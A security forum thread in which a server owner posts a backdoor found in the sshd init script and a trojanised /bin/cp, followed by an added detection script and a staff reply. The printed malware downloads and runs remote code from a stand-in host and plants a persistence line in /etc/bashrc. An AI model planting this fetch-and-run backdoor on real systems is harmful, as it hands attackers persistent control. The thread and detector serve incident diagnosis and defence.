Server Possibly Compromised

Discussion in 'Security' started by mordormx, Feb 17, 2016.

  1. mordormx

    mordormx Registered
    Hi guys,
    today I detected some weird lines in /etc/init.d/sshd in the start function. This is the content:

    Code:
    start()
    {
        [ -x $SSHD ] || exit 5
        [ -f /etc/ssh/sshd_config ] || exit 6
        # Create keys if necessary
        if [ "x${AUTOCREATE_SERVER_KEYS}" != xNO ]; then
            do_rsa_keygen
            if [ "x${AUTOCREATE_SERVER_KEYS}" != xRSAONLY ]; then
                do_rsa1_keygen
                do_dsa_keygen
            fi
        fi

        Inject='/etc/bashrc' #/etc/bashrc
        Bar='/bin/bar' #/bin/bar

        if [[ ! -a $Bar ]]; then
            wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
            chmod 755 bar >/dev/null 2>&1
            mv bar $Bar >/dev/null 2>&1
        fi;
        if ! grep -q $Bar $Inject; then
            echo -e "$Bar >/dev/null 2>&1" >> $Inject
        fi;

        if [[ ! grep -q "example.com" /bin/cp ]]; then
            cp /bin/cp /bin/copy >/dev/null 2>&1
            echo -e '#!/bin/sh\r\nwget http://example.com/Dynamic/g/run.txt >/dev/null 2>&1\r\nmv run.txt run.php\r\nchmod +x run.php\r\nphp run.php\r\nrm -rf run.php >/dev/null 2>&1' > /bin/cp
            chmod 755 /bin/cp
        fi;
    
    
    Now the content of /bin/cp is:

    Code:
    #!/bin/bash
    Inject="/etc/bashrc" #/etc/bashrc
    Bar="/bin/bar" #/bin/bar

    if [[ ! -a $Bar ]]; then
        wget http://example.com/Dynamic/g/bar >/dev/null 2>&1
        chmod 755 bar >/dev/null 2>&1
        mv bar $Bar >/dev/null 2>&1
    fi;
    if ! grep -q "$Bar" $Inject; then
        echo -e "\n$Bar >/dev/null 2>&1" >> $Inject
    fi;

    copy
    
    Have any of you experienced this?

    Checking this URL http://example.com/Dynamic/g/run.txt, it looks like very dangerous code; now I have to research how it happened.

    Any advice or comment?
     
    #1 mordormx, Feb 17, 2016
    Last edited by a moderator: Feb 17, 2016
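As an added example (not part of the post above and not a cPanel tool), the POSIX sh script below checks a directory tree for the three traits the poster found: a shell script sitting where /bin/cp should be, a download command inside an init script, and a line in /etc/bashrc that silently launches an extra program. It builds its own constructed sample tree under a temporary directory; the ROOT variable, the sample file contents and the finding labels are assumptions for illustration.

```shell
#!/bin/sh
# Added example, not code from the forum post. Checks a directory tree for
# the three traits visible above: a shell script installed in place of
# /bin/cp, a download command inside an init script, and an /etc/bashrc line
# that silently launches an extra binary. ROOT defaults to a constructed
# sandbox so nothing on the live system is read unless ROOT=/ is set.
ROOT="${ROOT:-$(mktemp -d)}"

# Build a constructed sample tree mirroring the poster's findings, plus one
# ELF-looking stand-in for a genuine binary so the check has a negative case.
make_sample_tree() {
    mkdir -p "$ROOT/bin" "$ROOT/etc/init.d"
    printf '#!/bin/sh\nwget http://example.com/Dynamic/g/run.txt\n' > "$ROOT/bin/cp"
    printf '\177ELF\002\001\001\n' > "$ROOT/bin/ls"
    printf 'start() {\n  wget http://example.com/Dynamic/g/bar\n}\n' > "$ROOT/etc/init.d/sshd"
    printf 'alias ll="ls -l"\n/bin/bar >/dev/null 2>&1\n' > "$ROOT/etc/bashrc"
}

# A genuine coreutils binary is ELF; a file in /bin whose first bytes are "#!"
# has been replaced by a script. Returns 0 (true) when that is the case.
script_in_bin() {
    IFS= read -r first < "$1" || :
    case "$first" in '#!'*) return 0 ;; *) return 1 ;; esac
}

# Init scripts have no business fetching files; returns 0 if wget/curl appears.
init_script_downloads() {
    grep -Eq '(^|[^A-Za-z0-9_])(wget|curl)([^A-Za-z0-9_]|$)' "$1"
}

# A bashrc line that runs a /bin program and discards all output is the
# launcher pattern from the post; returns 0 if present.
bashrc_launches_silently() {
    grep -Eq '^/bin/[A-Za-z0-9_.-]+ +>/dev/null 2>&1' "$1"
}

# Run every check over $ROOT, print one line per finding and a final count.
scan_tree() {
    n=0
    for f in "$ROOT"/bin/*; do
        [ -f "$f" ] && script_in_bin "$f" && { echo "SCRIPT-IN-BIN: $f"; n=$((n + 1)); }
    done
    for f in "$ROOT"/etc/init.d/*; do
        [ -f "$f" ] && init_script_downloads "$f" && { echo "DOWNLOAD-IN-INIT: $f"; n=$((n + 1)); }
    done
    f="$ROOT/etc/bashrc"
    [ -f "$f" ] && bashrc_launches_silently "$f" && { echo "SILENT-LAUNCHER: $f"; n=$((n + 1)); }
    echo "findings=$n"
}
```

Against a live host, run it with ROOT=/ and confirm any hit with the package manager's own verification (for example rpm -V coreutils openssh-server on an RPM-based system), since a replaced /bin/cp means nothing that binary reports can be trusted.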
  2. Infopro

    Infopro cPanel Sr. Product Evangelist
    Staff Member
    Please don't post actual links or domain names in your posts. Especially those to compromised servers.

    cPanel is unable to assist you with a compromised server, you should seek the assistance of a professional about this.
     